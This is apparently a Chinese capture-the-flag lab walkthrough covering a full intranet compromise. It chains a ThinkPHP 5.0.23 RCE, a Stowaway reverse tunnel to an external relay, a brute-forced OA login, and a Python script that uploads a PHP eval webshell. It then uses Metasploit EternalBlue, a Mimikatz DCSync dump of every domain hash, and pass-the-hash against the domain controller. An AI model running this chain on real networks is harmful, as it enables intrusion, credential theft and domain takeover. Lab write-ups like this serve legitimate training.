春秋云境-Initial
flag01
打开题目,一个登录页面,网站图标可判断出来是thinkphp框架搭建的一个网站

./fscan -h 39.98.120.87

扫出来有一个thinkphp5023的洞

- 用一个thinkphp的专门的工具ThinkPhpGUI扫一下

爆出的是ThinkPHP 5.0.23 RCE漏洞的poc,还找出了一个后门peiqi.php
直接拿poc在get一下,发现并没有什么回显


Text1 2 3 4 5
| whoami #确认当前登录用户身份 问出来是普通用户,并非root
uname -a #获取系统内核、发行版、主机名等信息 Linux ubuntu-web01 5.4.0-110-generic *#124-Ubuntu SMP Thu Apr 14 19:46:19 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux*
**sudo -l**** **** #列出当前用户可执行的 sudo 权限命令**
|

得到flag的片段1flag{60b53231-
flag02
刚刚一直在外网里面扫,现在到内网里面扫
Text1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| chmod 777 ./fscan
ip a #了解内网的网段 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 00:16:3e:1e:d4:00 brd ff:ff:ff:ff:ff:ff inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0 valid_lft 315358560sec preferred_lft 315358560sec inet6 fe80::216:3eff:fe1e:d400/64 scope link valid_lft forever preferred_lft forever
./fscan -h 172.22.1.0/24
|


据此收集到的信息是:
Text1 2 3
| 172.22.1.2:**DC域控** 172.22.1.21:Windows的机器并且存在MS17-010 漏洞 172.22.1.18:信呼OA办公系统
|
- 下一步,为了进入内网并能成功访问上述内容,我们要用Stowaway搭建隧道
我们将agent版上传到靶机,admin版放到kali中
由于做这个题我是电脑上做的,先要做一步在kali上用cpolar连通外网
cpolar tcp 7000
获得公网ip+port 17.tcp.cpolar.top:12690
现在kali -> vps
Text1 2 3
| 上传 admin
./linux_x64_admin -l 12345 -s 123456 #-l (开放端口号) -s (密码)
|

靶机:
Text1 2 3 4 5 6 7 8 9 10
| 先放到 /tmp 下
cp ./linux_x64_agent /tmp/linux_x64_agent
cd /tmp
chmod 777 ./linux_x64_agent
./linux_x64_agent -c 17.tcp.cpolar.top:12690 -s 123456 --reconnect 8 #-c 连接目标 -s 密码 --reconnect 8 断开后每隔8秒重连一次
|

回到vps上,已经开始连接

Text1 2 3
| use 0
socks 5555 #这里随便开一个5555
|

然后配置代理,在火狐上打开172.22.1.18:信呼OA办公系统


用bp爆破,得到 admin/admin123
1 2 3 4 5 6 7 8
| import requests s=requests.session() p={"http":"socks5h://127.0.0.1:5555","https":"socks5h://127.0.0.1:5555"} u="http://172.22.1.18/" s.post(u+"?a=check&m=login",data={"adminuser":"YWRtaW4=","adminpass":"YWRtaW4xMjM="},proxies=p) r=s.post(u+"index.php?a=upfile&m=upload",files={"file":('1.php',"<?php eval($_POST[Infernity]);")},proxies=p) s.get(u+f"task.php?m=qcloudCos|runt&a=run&fileid={r.json()['id']}",proxies=p) print(s.post(u+r.json()['filepath'].split('.uptemp')[0]+'.php',data={"Infernity":"system('whoami');"},proxies=p).text)
|
- 给蚁剑配一个代理,ip是我vps的ip,端口是socks的


dir C:\flag* /s /b


flag02: 2ce3-4813-87d4-
flag03
从上一图末的提示,最后一个flag在DC中,我们需要渗透到内网中,并利用漏洞获得DC的权限
根据flag02中fscan内网出来的,我们借助MS17-010 漏洞
Text1 2 3
| sudo vim /etc/proxychains4.conf
写入:socks5 127.0.0.1 5555
|
Text1 2 3 4 5
| proxychains4 msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.1.21 exploit
|


win了 成功渗透
Text1 2
| load kiwi #加载这个抓取hash的模块 kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值)
|


Administrator 10cf89a850fb1cdbe6bb432b859164c8
Text1 2 3
| proxychains4 crackmapexec smb <域控IP> -u Administrator -H <你的NTLM哈希> -d <域名> -x "<执行语句>"
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag03.txt"
|

flag03: e8f88d0d43d6}
综上,flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}